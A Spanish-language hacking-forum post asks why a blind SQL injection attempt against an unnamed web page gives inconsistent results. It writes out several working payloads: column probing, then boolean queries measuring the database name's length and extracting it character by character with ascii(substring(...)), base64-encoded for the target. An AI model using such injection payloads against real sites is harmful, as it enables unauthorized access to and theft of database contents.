elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Problas con blind injection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problas con blind injection  (Leído 1,862 veces)
G0kuu_G0kuu

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Problas con blind injection
« en: 15 Julio 2011, 10:22 am »

hola a todos, les contaré como esta la cosa, estoy con una un problema ya días con una consultas que le hago a las bd, comencé con el simple select 1,2,3 etc
hasta llegar a 10 dejo de mostrar el error, pero no arrojo ningún numero,
me dijeron que probara con blind sqli , y  proseguí a  sacar la longitud de la base de datos:
con el Length(database()) < 32, fui disminuyendo el 32 hasta llegar al numero 5
SUB5394'  AND Length((database())) =5 -- a
y salio que era verdadero
entonces prosegui a sacar caracter por caracter para saber el nombre de la base de datos
SUB5394' AND ascii(substring((database()),1,1)) =97 -- a  sale true
SUB5394' AND ascii(substring((database()),1,1)) = 98 -- a  sale true
SUB5394' AND ascii(substring((database()),1,1)) = 99 -- a sale true
SUB5394' and ascii(substring((database()),1,1))=109 -- a llegué hasta aqui y salio error

un dato interesante es que todas las consultas las paso a base64 porque la pagina solo trabaja en base64.

mi pregunta es : estoy haciendo algo malo?? ya q me dice que la primera letra pueden ser todas las letras distintas a m.

hay otra forma de hacer blind sql??
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Blind SQL Injection
Nivel Web
el-brujo 0 3,039 Último mensaje 17 Octubre 2007, 23:54 pm
por el-brujo
Blind SQL injection
Nivel Web
Mie2 2 3,769 Último mensaje 5 Noviembre 2008, 14:09 pm
por berz3k
Confusión con blind SQL injection
Seguridad
Schaiden 3 3,575 Último mensaje 27 Septiembre 2017, 06:13 am
por BloodSharp
Dudas en Blind SQL injection
Bugs y Exploits
onirico 1 2,280 Último mensaje 24 Agosto 2018, 04:49 am
por onirico
PREGUNTA - SQL BLIND INJECTION
Hacking
tobiasasa 4 3,580 Último mensaje 11 Abril 2020, 23:42 pm
por tobiasasa
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines